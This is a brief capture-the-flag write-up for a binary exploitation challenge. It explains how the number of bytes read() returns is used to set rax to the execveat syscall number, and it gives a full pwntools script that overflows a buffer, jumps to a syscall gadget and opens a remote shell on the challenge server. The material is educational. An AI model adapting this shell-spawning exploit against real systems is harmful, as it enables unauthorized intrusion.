In this challenge we can only control rax (the return value of syscall 0, read, which lies between 1 and 0x148) and rsi. Looking up the syscall table, the only usable call is execveat(0, "/bin/sh", 0, 0, 0), syscall number 322. So during the buffer overflow we first write "/bin/sh" into the buffer and make rax 322 (by controlling how many bytes read returns), then write 0x4000ed at the return address (we cannot jump straight to the syscall instruction; rdx must be cleared first).
#!/usr/bin/env python3
from pwn import *

context.update(arch='amd64', os='linux')

# The buffer starts with the path that rsi will point at.
payload = b'/bin/sh\x00'
# Pad up to the saved return address (offset 296); cyclic() already returns bytes.
payload += cyclic(296 - len(payload))
payload += p64(0x4000ED)  # xor rdx, rdx; syscall
# Pad to 321 bytes: with the trailing newline from sendline() read() returns 322,
# so rax holds the execveat syscall number when the gadget reaches syscall.
payload += cyclic(321 - len(payload))

r = remote('pwnhub.tw', 55688)
r.sendline(payload)
r.interactive()